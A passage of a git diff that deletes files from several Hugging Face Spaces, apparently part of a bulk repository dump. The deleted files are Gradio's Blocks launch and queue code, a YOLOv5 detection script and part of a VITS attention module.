postprocess: Instance Method - If False, will not run postprocessing of component data before returning 'fn' output to the browser. - every: Instance Method - Run this event 'every' number of seconds. Interpreted in seconds. Queue must be enabled. - Example: - import gradio as gr - import datetime - with gr.Blocks() as demo: - def get_time(): - return datetime.datetime.now().time() - dt = gr.Textbox(label="Current time") - demo.load(get_time, inputs=None, outputs=dt) - demo.launch() - """ - # _js: Optional frontend js method to run before running 'fn'. Input arguments for js method are values of 'inputs' and 'outputs', return should be a list of values for output components. - if isinstance(self_or_cls, type): - if name is None: - raise ValueError( - "Blocks.load() requires passing parameters as keyword arguments" - ) - return external.load_blocks_from_repo(name, src, api_key, alias, **kwargs) - else: - return self_or_cls.set_event_trigger( - event_name="load", - fn=fn, - inputs=inputs, - outputs=outputs, - api_name=api_name, - preprocess=preprocess, - postprocess=postprocess, - scroll_to_output=scroll_to_output, - show_progress=show_progress, - js=_js, - queue=queue, - batch=batch, - max_batch_size=max_batch_size, - every=every, - no_target=True, - ) - - def clear(self): - """Resets the layout of the Blocks object.""" - self.blocks = {} - self.fns = [] - self.dependencies = [] - self.children = [] - return self - - @document() - def queue( - self, - concurrency_count: int = 1, - status_update_rate: float | Literal["auto"] = "auto", - client_position_to_load_data: int | None = None, - default_enabled: bool | None = None, - api_open: bool = True, - max_size: int | None = None, - ): - """ - You can control the rate of processed requests by creating a queue. This will allow you to set the number of requests to be processed at one time, and will let users know their position in the queue. - Parameters: - concurrency_count: Number of worker threads that will be processing requests from the queue concurrently. Increasing this number will increase the rate at which requests are processed, but will also increase the memory usage of the queue. - status_update_rate: If "auto", Queue will send status estimations to all clients whenever a job is finished. Otherwise Queue will send status at regular intervals set by this parameter as the number of seconds. - client_position_to_load_data: DEPRECATED. This parameter is deprecated and has no effect. - default_enabled: Deprecated and has no effect. - api_open: If True, the REST routes of the backend will be open, allowing requests made directly to those endpoints to skip the queue. - max_size: The maximum number of events the queue will store at any given moment. If the queue is full, new events will not be added and a user will receive a message saying that the queue is full. If None, the queue size will be unlimited. - Example: - demo = gr.Interface(gr.Textbox(), gr.Image(), image_generator) - demo.queue(concurrency_count=3) - demo.launch() - """ - if default_enabled is not None: - warnings.warn( - "The default_enabled parameter of queue has no effect and will be removed " - "in a future version of gradio." - ) - self.enable_queue = True - self.api_open = api_open - if client_position_to_load_data is not None: - warnings.warn("The client_position_to_load_data parameter is deprecated.") - self._queue = queueing.Queue( - live_updates=status_update_rate == "auto", - concurrency_count=concurrency_count, - update_intervals=status_update_rate if status_update_rate != "auto" else 1, - max_size=max_size, - blocks_dependencies=self.dependencies, - ) - self.config = self.get_config_file() - return self - - def launch( - self, - inline: bool | None = None, - inbrowser: bool = False, - share: bool | None = None, - debug: bool = False, - enable_queue: bool | None = None, - max_threads: int = 40, - auth: Callable | Tuple[str, str] | List[Tuple[str, str]] | None = None, - auth_message: str | None = None, - prevent_thread_lock: bool = False, - show_error: bool = False, - server_name: str | None = None, - server_port: int | None = None, - show_tips: bool = False, - height: int = 500, - width: int | str = "100%", - encrypt: bool = False, - favicon_path: str | None = None, - ssl_keyfile: str | None = None, - ssl_certfile: str | None = None, - ssl_keyfile_password: str | None = None, - quiet: bool = False, - show_api: bool = True, - _frontend: bool = True, - ) -> Tuple[FastAPI, str, str]: - """ - Launches a simple web server that serves the demo. Can also be used to create a - public link used by anyone to access the demo from their browser by setting share=True. - - Parameters: - inline: whether to display in the interface inline in an iframe. Defaults to True in python notebooks; False otherwise. - inbrowser: whether to automatically launch the interface in a new tab on the default browser. - share: whether to create a publicly shareable link for the interface. Creates an SSH tunnel to make your UI accessible from anywhere. If not provided, it is set to False by default every time, except when running in Google Colab. When localhost is not accessible (e.g. Google Colab), setting share=False is not supported. - debug: if True, blocks the main thread from running. If running in Google Colab, this is needed to print the errors in the cell output. - auth: If provided, username and password (or list of username-password tuples) required to access interface. Can also provide function that takes username and password and returns True if valid login. - auth_message: If provided, HTML message provided on login page. - prevent_thread_lock: If True, the interface will block the main thread while the server is running. - show_error: If True, any errors in the interface will be displayed in an alert modal and printed in the browser console log - server_port: will start gradio app on this port (if available). Can be set by environment variable GRADIO_SERVER_PORT. If None, will search for an available port starting at 7860. - server_name: to make app accessible on local network, set this to "0.0.0.0". Can be set by environment variable GRADIO_SERVER_NAME. If None, will use "127.0.0.1". - show_tips: if True, will occasionally show tips about new Gradio features - enable_queue: DEPRECATED (use .queue() method instead.) if True, inference requests will be served through a queue instead of with parallel threads. Required for longer inference times (> 1min) to prevent timeout. The default option in HuggingFace Spaces is True. The default option elsewhere is False. - max_threads: the maximum number of total threads that the Gradio app can generate in parallel. The default is inherited from the starlette library (currently 40). Applies whether the queue is enabled or not. But if queuing is enabled, this parameter is increaseed to be at least the concurrency_count of the queue. - width: The width in pixels of the iframe element containing the interface (used if inline=True) - height: The height in pixels of the iframe element containing the interface (used if inline=True) - encrypt: If True, flagged data will be encrypted by key provided by creator at launch - favicon_path: If a path to a file (.png, .gif, or .ico) is provided, it will be used as the favicon for the web page. - ssl_keyfile: If a path to a file is provided, will use this as the private key file to create a local server running on https. - ssl_certfile: If a path to a file is provided, will use this as the signed certificate for https. Needs to be provided if ssl_keyfile is provided. - ssl_keyfile_password: If a password is provided, will use this with the ssl certificate for https. - quiet: If True, suppresses most print statements. - show_api: If True, shows the api docs in the footer of the app. Default True. If the queue is enabled, then api_open parameter of .queue() will determine if the api docs are shown, independent of the value of show_api. - Returns: - app: FastAPI app object that is running the demo - local_url: Locally accessible link to the demo - share_url: Publicly accessible link to the demo (if share=True, otherwise None) - Example: - import gradio as gr - def reverse(text): - return text[::-1] - demo = gr.Interface(reverse, "text", "text") - demo.launch(share=True, auth=("username", "password")) - """ - self.dev_mode = False - if ( - auth - and not callable(auth) - and not isinstance(auth[0], tuple) - and not isinstance(auth[0], list) - ): - self.auth = [auth] - else: - self.auth = auth - self.auth_message = auth_message - self.show_tips = show_tips - self.show_error = show_error - self.height = height - self.width = width - self.favicon_path = favicon_path - self.progress_tracking = any( - block_fn.fn is not None and special_args(block_fn.fn)[1] is not None - for block_fn in self.fns - ) - - if enable_queue is not None: - self.enable_queue = enable_queue - warnings.warn( - "The `enable_queue` parameter has been deprecated. Please use the `.queue()` method instead.", - DeprecationWarning, - ) - - if self.is_space: - self.enable_queue = self.enable_queue is not False - else: - self.enable_queue = self.enable_queue is True - if self.enable_queue and not hasattr(self, "_queue"): - self.queue() - self.show_api = self.api_open if self.enable_queue else show_api - - if not self.enable_queue and self.progress_tracking: - raise ValueError("Progress tracking requires queuing to be enabled.") - - for dep in self.dependencies: - for i in dep["cancels"]: - if not self.queue_enabled_for_fn(i): - raise ValueError( - "In order to cancel an event, the queue for that event must be enabled! " - "You may get this error by either 1) passing a function that uses the yield keyword " - "into an interface without enabling the queue or 2) defining an event that cancels " - "another event without enabling the queue. Both can be solved by calling .queue() " - "before .launch()" - ) - if dep["batch"] and ( - dep["queue"] is False - or (dep["queue"] is None and not self.enable_queue) - ): - raise ValueError("In order to use batching, the queue must be enabled.") - - self.config = self.get_config_file() - self.encrypt = encrypt - self.max_threads = max( - self._queue.max_thread_count if self.enable_queue else 0, max_threads - ) - if self.encrypt: - self.encryption_key = encryptor.get_key( - getpass.getpass("Enter key for encryption: ") - ) - - if self.is_running: - assert isinstance( - self.local_url, str - ), f"Invalid local_url: {self.local_url}" - if not (quiet): - print( - "Rerunning server... use `close()` to stop if you need to change `launch()` parameters.\n----" - ) - else: - server_name, server_port, local_url, app, server = networking.start_server( - self, - server_name, - server_port, - ssl_keyfile, - ssl_certfile, - ssl_keyfile_password, - ) - self.server_name = server_name - self.local_url = local_url - self.server_port = server_port - self.server_app = app - self.server = server - self.is_running = True - self.is_colab = utils.colab_check() - self.protocol = ( - "https" - if self.local_url.startswith("https") or self.is_colab - else "http" - ) - - if self.enable_queue: - self._queue.set_url(self.local_url) - - # Cannot run async functions in background other than app's scope. - # Workaround by triggering the app endpoint - requests.get(f"{self.local_url}startup-events") - - if self.enable_queue: - if self.encrypt: - raise ValueError("Cannot queue with encryption enabled.") - utils.launch_counter() - - self.share = ( - share - if share is not None - else True - if self.is_colab and self.enable_queue - else False - ) - - # If running in a colab or not able to access localhost, - # a shareable link must be created. - if _frontend and (not networking.url_ok(self.local_url)) and (not self.share): - raise ValueError( - "When localhost is not accessible, a shareable link must be created. Please set share=True." - ) - - if self.is_colab: - if not quiet: - if debug: - print(strings.en["COLAB_DEBUG_TRUE"]) - else: - print(strings.en["COLAB_DEBUG_FALSE"]) - if not self.share: - print(strings.en["COLAB_WARNING"].format(self.server_port)) - if self.enable_queue and not self.share: - raise ValueError( - "When using queueing in Colab, a shareable link must be created. Please set share=True." - ) - else: - print( - strings.en["RUNNING_LOCALLY_SEPARATED"].format( - self.protocol, self.server_name, self.server_port - ) - ) - - if self.share: - if self.is_space: - raise RuntimeError("Share is not supported when you are in Spaces") - try: - if self.share_url is None: - self.share_url = networking.setup_tunnel( - self.server_name, self.server_port - ) - print(strings.en["SHARE_LINK_DISPLAY"].format(self.share_url)) - if not (quiet): - print(strings.en["SHARE_LINK_MESSAGE"]) - except RuntimeError: - if self.analytics_enabled: - utils.error_analytics(self.ip_address, "Not able to set up tunnel") - self.share_url = None - self.share = False - print(strings.en["COULD_NOT_GET_SHARE_LINK"]) - else: - if not (quiet): - print(strings.en["PUBLIC_SHARE_TRUE"]) - self.share_url = None - - if inbrowser: - link = self.share_url if self.share and self.share_url else self.local_url - webbrowser.open(link) - - # Check if running in a Python notebook in which case, display inline - if inline is None: - inline = utils.ipython_check() and (self.auth is None) - if inline: - if self.auth is not None: - print( - "Warning: authentication is not supported inline. Please" - "click the link to access the interface in a new tab." - ) - try: - from IPython.display import HTML, Javascript, display # type: ignore - - if self.share and self.share_url: - while not networking.url_ok(self.share_url): - time.sleep(0.25) - display( - HTML( - f'
    ' - ) - ) - elif self.is_colab: - # modified from /usr/local/lib/python3.7/dist-packages/google/colab/output/_util.py within Colab environment - code = """(async (port, path, width, height, cache, element) => { - if (!google.colab.kernel.accessAllowed && !cache) { - return; - } - element.appendChild(document.createTextNode('')); - const url = await google.colab.kernel.proxyPort(port, {cache}); - - const external_link = document.createElement('div'); - external_link.innerHTML = ` - - `; - element.appendChild(external_link); - - const iframe = document.createElement('iframe'); - iframe.src = new URL(path, url).toString(); - iframe.height = height; - iframe.allow = "autoplay; camera; microphone; clipboard-read; clipboard-write;" - iframe.width = width; - iframe.style.border = 0; - element.appendChild(iframe); - })""" + "({port}, {path}, {width}, {height}, {cache}, window.element)".format( - port=json.dumps(self.server_port), - path=json.dumps("/"), - width=json.dumps(self.width), - height=json.dumps(self.height), - cache=json.dumps(False), - ) - - display(Javascript(code)) - else: - display( - HTML( - f'
    ' - ) - ) - except ImportError: - pass - - if getattr(self, "analytics_enabled", False): - data = { - "launch_method": "browser" if inbrowser else "inline", - "is_google_colab": self.is_colab, - "is_sharing_on": self.share, - "share_url": self.share_url, - "ip_address": self.ip_address, - "enable_queue": self.enable_queue, - "show_tips": self.show_tips, - "server_name": server_name, - "server_port": server_port, - "is_spaces": self.is_space, - "mode": self.mode, - } - utils.launch_analytics(data) - - utils.show_tip(self) - - # Block main thread if debug==True - if debug or int(os.getenv("GRADIO_DEBUG", 0)) == 1: - self.block_thread() - # Block main thread if running in a script to stop script from exiting - is_in_interactive_mode = bool(getattr(sys, "ps1", sys.flags.interactive)) - - if not prevent_thread_lock and not is_in_interactive_mode: - self.block_thread() - - return TupleNoPrint((self.server_app, self.local_url, self.share_url)) - - def integrate( - self, - comet_ml: comet_ml.Experiment | None = None, - wandb: ModuleType | None = None, - mlflow: ModuleType | None = None, - ) -> None: - """ - A catch-all method for integrating with other libraries. This method should be run after launch() - Parameters: - comet_ml: If a comet_ml Experiment object is provided, will integrate with the experiment and appear on Comet dashboard - wandb: If the wandb module is provided, will integrate with it and appear on WandB dashboard - mlflow: If the mlflow module is provided, will integrate with the experiment and appear on ML Flow dashboard - """ - analytics_integration = "" - if comet_ml is not None: - analytics_integration = "CometML" - comet_ml.log_other("Created from", "Gradio") - if self.share_url is not None: - comet_ml.log_text("gradio: " + self.share_url) - comet_ml.end() - elif self.local_url: - comet_ml.log_text("gradio: " + self.local_url) - comet_ml.end() - else: - raise ValueError("Please run `launch()` first.") - if wandb is not None: - analytics_integration = "WandB" - if self.share_url is not None: - wandb.log( - { - "Gradio panel": wandb.Html( - '' - ) - } - ) - else: - print( - "The WandB integration requires you to " - "`launch(share=True)` first." - ) - if mlflow is not None: - analytics_integration = "MLFlow" - if self.share_url is not None: - mlflow.log_param("Gradio Interface Share Link", self.share_url) - else: - mlflow.log_param("Gradio Interface Local Link", self.local_url) - if self.analytics_enabled and analytics_integration: - data = {"integration": analytics_integration} - utils.integration_analytics(data) - - def close(self, verbose: bool = True) -> None: - """ - Closes the Interface that was launched and frees the port. - """ - try: - if self.enable_queue: - self._queue.close() - self.server.close() - self.is_running = False - if verbose: - print("Closing server running on port: {}".format(self.server_port)) - except (AttributeError, OSError): # can't close if not running - pass - - def block_thread( - self, - ) -> None: - """Block main thread until interrupted by user.""" - try: - while True: - time.sleep(0.1) - except (KeyboardInterrupt, OSError): - print("Keyboard interruption in main thread... closing server.") - self.server.close() - for tunnel in CURRENT_TUNNELS: - tunnel.kill() - - def attach_load_events(self): - """Add a load event for every component whose initial value should be randomized.""" - if Context.root_block: - for component in Context.root_block.blocks.values(): - if ( - isinstance(component, components.IOComponent) - and component.load_event_to_attach - ): - load_fn, every = component.load_event_to_attach - # Use set_event_trigger to avoid ambiguity between load class/instance method - self.set_event_trigger( - "load", - load_fn, - None, - component, - no_target=True, - queue=False, - every=every, - ) - - def startup_events(self): - """Events that should be run when the app containing this block starts up.""" - - if self.enable_queue: - utils.run_coro_in_background(self._queue.start, (self.progress_tracking,)) - utils.run_coro_in_background(self.create_limiter) - - def queue_enabled_for_fn(self, fn_index: int): - if self.dependencies[fn_index]["queue"] is None: - return self.enable_queue - return self.dependencies[fn_index]["queue"] diff --git a/spaces/Ibtehaj10/cheating-detection-FYP/yolovs5/detect.py b/spaces/Ibtehaj10/cheating-detection-FYP/yolovs5/detect.py deleted file mode 100644 index 58b02802e6d9d3661c476dd88bf52b08b8445eef..0000000000000000000000000000000000000000 --- a/spaces/Ibtehaj10/cheating-detection-FYP/yolovs5/detect.py +++ /dev/null @@ -1,259 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Run YOLOv5 detection inference on images, videos, directories, globs, YouTube, webcam, streams, etc. - -Usage - sources: - $ python detect.py --weights yolov5s.pt --source 0 # webcam - img.jpg # image - vid.mp4 # video - screen # screenshot - path/ # directory - 'path/*.jpg' # glob - 'https://youtu.be/Zgi9g1ksQHc' # YouTube - 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP stream - -Usage - formats: - $ python detect.py --weights yolov5s.pt # PyTorch - yolov5s.torchscript # TorchScript - yolov5s.onnx # ONNX Runtime or OpenCV DNN with --dnn - yolov5s_openvino_model # OpenVINO - yolov5s.engine # TensorRT - yolov5s.mlmodel # CoreML (macOS-only) - yolov5s_saved_model # TensorFlow SavedModel - yolov5s.pb # TensorFlow GraphDef - yolov5s.tflite # TensorFlow Lite - yolov5s_edgetpu.tflite # TensorFlow Edge TPU - yolov5s_paddle_model # PaddlePaddle -""" - -import argparse -import os -import platform -import sys -from pathlib import Path - -import torch - -FILE = Path(__file__).resolve() -ROOT = FILE.parents[0] # YOLOv5 root directory -if str(ROOT) not in sys.path: - sys.path.append(str(ROOT)) # add ROOT to PATH -ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative - -from models.common import DetectMultiBackend -from utils.dataloaders import IMG_FORMATS, VID_FORMATS, LoadImages, LoadScreenshots, LoadStreams -from utils.general import (LOGGER, Profile, check_file, check_img_size, check_imshow, check_requirements, colorstr, cv2, - increment_path, non_max_suppression, print_args, scale_boxes, strip_optimizer, xyxy2xywh) -from utils.plots import Annotator, colors, save_one_box -from utils.torch_utils import select_device, smart_inference_mode - - -@smart_inference_mode() -def run( - weights=ROOT / 'yolov5s.pt', # model path or triton URL - source=ROOT / 'data/images', # file/dir/URL/glob/screen/0(webcam) - data=ROOT / 'data/coco128.yaml', # dataset.yaml path - imgsz=(640, 640), # inference size (height, width) - conf_thres=0.25, # confidence threshold - iou_thres=0.45, # NMS IOU threshold - max_det=1000, # maximum detections per image - device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu - view_img=False, # show results - save_txt=False, # save results to *.txt - save_conf=False, # save confidences in --save-txt labels - save_crop=False, # save cropped prediction boxes - nosave=False, # do not save images/videos - classes=None, # filter by class: --class 0, or --class 0 2 3 - agnostic_nms=False, # class-agnostic NMS - augment=False, # augmented inference - visualize=False, # visualize features - update=False, # update all models - project=ROOT / 'runs/detect', # save results to project/name - name='exp', # save results to project/name - exist_ok=False, # existing project/name ok, do not increment - line_thickness=3, # bounding box thickness (pixels) - hide_labels=False, # hide labels - hide_conf=False, # hide confidences - half=False, # use FP16 half-precision inference - dnn=False, # use OpenCV DNN for ONNX inference - vid_stride=1, # video frame-rate stride -): - source = str(source) - save_img = not nosave and not source.endswith('.txt') # save inference images - is_file = Path(source).suffix[1:] in (IMG_FORMATS + VID_FORMATS) - is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://')) - webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file) - screenshot = source.lower().startswith('screen') - if is_url and is_file: - source = check_file(source) # download - - # Directories - save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run - (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir - - # Load model - device = select_device(device) - model = DetectMultiBackend(weights, device=device, dnn=dnn, data=data, fp16=half) - stride, names, pt = model.stride, model.names, model.pt - imgsz = check_img_size(imgsz, s=stride) # check image size - - # Dataloader - bs = 1 # batch_size - if webcam: - view_img = check_imshow(warn=True) - dataset = LoadStreams(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride) - bs = len(dataset) - elif screenshot: - dataset = LoadScreenshots(source, img_size=imgsz, stride=stride, auto=pt) - else: - dataset = LoadImages(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride) - vid_path, vid_writer = [None] * bs, [None] * bs - - # Run inference - model.warmup(imgsz=(1 if pt or model.triton else bs, 3, *imgsz)) # warmup - seen, windows, dt = 0, [], (Profile(), Profile(), Profile()) - for path, im, im0s, vid_cap, s in dataset: - with dt[0]: - im = torch.from_numpy(im).to(model.device) - im = im.half() if model.fp16 else im.float() # uint8 to fp16/32 - im /= 255 # 0 - 255 to 0.0 - 1.0 - if len(im.shape) == 3: - im = im[None] # expand for batch dim - - # Inference - with dt[1]: - visualize = increment_path(save_dir / Path(path).stem, mkdir=True) if visualize else False - pred = model(im, augment=augment, visualize=visualize) - - # NMS - with dt[2]: - pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det) - - # Second-stage classifier (optional) - # pred = utils.general.apply_classifier(pred, classifier_model, im, im0s) - - # Process predictions - for i, det in enumerate(pred): # per image - seen += 1 - if webcam: # batch_size >= 1 - p, im0, frame = path[i], im0s[i].copy(), dataset.count - s += f'{i}: ' - else: - p, im0, frame = path, im0s.copy(), getattr(dataset, 'frame', 0) - - p = Path(p) # to Path - save_path = str(save_dir / p.name) # im.jpg - txt_path = str(save_dir / 'labels' / p.stem) + ('' if dataset.mode == 'image' else f'_{frame}') # im.txt - s += '%gx%g ' % im.shape[2:] # print string - gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh - imc = im0.copy() if save_crop else im0 # for save_crop - annotator = Annotator(im0, line_width=line_thickness, example=str(names)) - if len(det): - # Rescale boxes from img_size to im0 size - det[:, :4] = scale_boxes(im.shape[2:], det[:, :4], im0.shape).round() - - # Print results - for c in det[:, 5].unique(): - n = (det[:, 5] == c).sum() # detections per class - s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string - - # Write results - for *xyxy, conf, cls in reversed(det): - if save_txt: # Write to file - xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh - line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format - with open(f'{txt_path}.txt', 'a') as f: - f.write(('%g ' * len(line)).rstrip() % line + '\n') - - if save_img or save_crop or view_img: # Add bbox to image - c = int(cls) # integer class - label = None if hide_labels else (names[c] if hide_conf else f'{names[c]} {conf:.2f}') - annotator.box_label(xyxy, label, color=colors(c, True)) - if save_crop: - save_one_box(xyxy, imc, file=save_dir / 'crops' / names[c] / f'{p.stem}.jpg', BGR=True) - - # Stream results - im0 = annotator.result() - if view_img: - if platform.system() == 'Linux' and p not in windows: - windows.append(p) - cv2.namedWindow(str(p), cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux) - cv2.resizeWindow(str(p), im0.shape[1], im0.shape[0]) - cv2.imshow(str(p), im0) - cv2.waitKey(1) # 1 millisecond - - # Save results (image with detections) - if save_img: - if dataset.mode == 'image': - cv2.imwrite(save_path, im0) - else: # 'video' or 'stream' - if vid_path[i] != save_path: # new video - vid_path[i] = save_path - if isinstance(vid_writer[i], cv2.VideoWriter): - vid_writer[i].release() # release previous video writer - if vid_cap: # video - fps = vid_cap.get(cv2.CAP_PROP_FPS) - w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH)) - h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) - else: # stream - fps, w, h = 30, im0.shape[1], im0.shape[0] - save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos - vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h)) - vid_writer[i].write(im0) - - # Print time (inference-only) - LOGGER.info(f"{s}{'' if len(det) else '(no detections), '}{dt[1].dt * 1E3:.1f}ms") - - # Print results - t = tuple(x.t / seen * 1E3 for x in dt) # speeds per image - LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {(1, 3, *imgsz)}' % t) - if save_txt or save_img: - s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else '' - LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}") - if update: - strip_optimizer(weights[0]) # update model (to fix SourceChangeWarning) - - -def parse_opt(): - parser = argparse.ArgumentParser() - parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model path or triton URL') - parser.add_argument('--source', type=str, default=ROOT / 'data/images', help='file/dir/URL/glob/screen/0(webcam)') - parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='(optional) dataset.yaml path') - parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w') - parser.add_argument('--conf-thres', type=float, default=0.25, help='confidence threshold') - parser.add_argument('--iou-thres', type=float, default=0.45, help='NMS IoU threshold') - parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image') - parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') - parser.add_argument('--view-img', action='store_true', help='show results') - parser.add_argument('--save-txt', action='store_true', help='save results to *.txt') - parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels') - parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes') - parser.add_argument('--nosave', action='store_true', help='do not save images/videos') - parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3') - parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS') - parser.add_argument('--augment', action='store_true', help='augmented inference') - parser.add_argument('--visualize', action='store_true', help='visualize features') - parser.add_argument('--update', action='store_true', help='update all models') - parser.add_argument('--project', default=ROOT / 'runs/detect', help='save results to project/name') - parser.add_argument('--name', default='exp', help='save results to project/name') - parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment') - parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)') - parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels') - parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences') - parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference') - parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference') - parser.add_argument('--vid-stride', type=int, default=1, help='video frame-rate stride') - opt = parser.parse_args() - opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand - print_args(vars(opt)) - return opt - - -def main(opt): - check_requirements(exclude=('tensorboard', 'thop')) - run(**vars(opt)) - - -if __name__ == "__main__": - opt = parse_opt() - main(opt) diff --git a/spaces/Ikaros521/VITS-fast-fine-tuning_nymph/attentions.py b/spaces/Ikaros521/VITS-fast-fine-tuning_nymph/attentions.py deleted file mode 100644 index 4e0b0c1fd48c962e21e1fbe60b23fc574927435c..0000000000000000000000000000000000000000 --- a/spaces/Ikaros521/VITS-fast-fine-tuning_nymph/attentions.py +++ /dev/null @@ -1,303 +0,0 @@ -import copy -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - -import commons -import modules -from modules import LayerNorm - - -class Encoder(nn.Module): - def __init__(self, hidden_channels, filter_channels, n_heads, n_layers, kernel_size=1, p_dropout=0., window_size=4, **kwargs): - super().__init__() - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.window_size = window_size - - self.drop = nn.Dropout(p_dropout) - self.attn_layers = nn.ModuleList() - self.norm_layers_1 = nn.ModuleList() - self.ffn_layers = nn.ModuleList() - self.norm_layers_2 = nn.ModuleList() - for i in range(self.n_layers): - self.attn_layers.append(MultiHeadAttention(hidden_channels, hidden_channels, n_heads, p_dropout=p_dropout, window_size=window_size)) - self.norm_layers_1.append(LayerNorm(hidden_channels)) - self.ffn_layers.append(FFN(hidden_channels, hidden_channels, filter_channels, kernel_size, p_dropout=p_dropout)) - self.norm_layers_2.append(LayerNorm(hidden_channels)) - - def forward(self, x, x_mask): - attn_mask = x_mask.unsqueeze(2) * x_mask.unsqueeze(-1) - x = x * x_mask - for i in range(self.n_layers): - y = self.attn_layers[i](x, x, attn_mask) - y = self.drop(y) - x = self.norm_layers_1[i](x + y) - - y = self.ffn_layers[i](x, x_mask) - y = self.drop(y) - x = self.norm_layers_2[i](x + y) - x = x * x_mask - return x - - -class Decoder(nn.Module): - def __init__(self, hidden_channels, filter_channels, n_heads, n_layers, kernel_size=1, p_dropout=0., proximal_bias=False, proximal_init=True, **kwargs): - super().__init__() - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.proximal_bias = proximal_bias - self.proximal_init = proximal_init - - self.drop = nn.Dropout(p_dropout) - self.self_attn_layers = nn.ModuleList() - self.norm_layers_0 = nn.ModuleList() - self.encdec_attn_layers = nn.ModuleList() - self.norm_layers_1 = nn.ModuleList() - self.ffn_layers = nn.ModuleList() - self.norm_layers_2 = nn.ModuleList() - for i in range(self.n_layers): - self.self_attn_layers.append(MultiHeadAttention(hidden_channels, hidden_channels, n_heads, p_dropout=p_dropout, proximal_bias=proximal_bias, proximal_init=proximal_init)) - self.norm_layers_0.append(LayerNorm(hidden_channels)) - self.encdec_attn_layers.append(MultiHeadAttention(hidden_channels, hidden_channels, n_heads, p_dropout=p_dropout)) - self.norm_layers_1.append(LayerNorm(hidden_channels)) - self.ffn_layers.append(FFN(hidden_channels, hidden_channels, filter_channels, kernel_size, p_dropout=p_dropout, causal=True)) - self.norm_layers_2.append(LayerNorm(hidden_channels)) - - def forward(self, x, x_mask, h, h_mask): - """ - x: decoder input - h: encoder output - """ - self_attn_mask = commons.subsequent_mask(x_mask.size(2)).to(device=x.device, dtype=x.dtype) - encdec_attn_mask = h_mask.unsqueeze(2) * x_mask.unsqueeze(-1) - x = x * x_mask - for i in range(self.n_layers): - y = self.self_attn_layers[i](x, x, self_attn_mask) - y = self.drop(y) - x = self.norm_layers_0[i](x + y) - - y = self.encdec_attn_layers[i](x, h, encdec_attn_mask) - y = self.drop(y) - x = self.norm_layers_1[i](x + y) - - y = self.ffn_layers[i](x, x_mask) - y = self.drop(y) - x = self.norm_layers_2[i](x + y) - x = x * x_mask - return x - - -class MultiHeadAttention(nn.Module): - def __init__(self, channels, out_channels, n_heads, p_dropout=0., window_size=None, heads_share=True, block_length=None, proximal_bias=False, proximal_init=False): - super().__init__() - assert channels % n_heads == 0 - - self.channels = channels - self.out_channels = out_channels - self.n_heads = n_heads - self.p_dropout = p_dropout - self.window_size = window_size - self.heads_share = heads_share - self.block_length = block_length - self.proximal_bias = proximal_bias - self.proximal_init = proximal_init - self.attn = None - - self.k_channels = channels // n_heads - self.conv_q = nn.Conv1d(channels, channels, 1) - self.conv_k = nn.Conv1d(channels, channels, 1) - self.conv_v = nn.Conv1d(channels, channels, 1) - self.conv_o = nn.Conv1d(channels, out_channels, 1) - self.drop = nn.Dropout(p_dropout) - - if window_size is not None: - n_heads_rel = 1 if heads_share else n_heads - rel_stddev = self.k_channels**-0.5 - self.emb_rel_k = nn.Parameter(torch.randn(n_heads_rel, window_size * 2 + 1, self.k_channels) * rel_stddev) - self.emb_rel_v = nn.Parameter(torch.randn(n_heads_rel, window_size * 2 + 1, self.k_channels) * rel_stddev) - - nn.init.xavier_uniform_(self.conv_q.weight) - nn.init.xavier_uniform_(self.conv_k.weight) - nn.init.xavier_uniform_(self.conv_v.weight) - if proximal_init: - with torch.no_grad(): - self.conv_k.weight.copy_(self.conv_q.weight) - self.conv_k.bias.copy_(self.conv_q.bias) - - def forward(self, x, 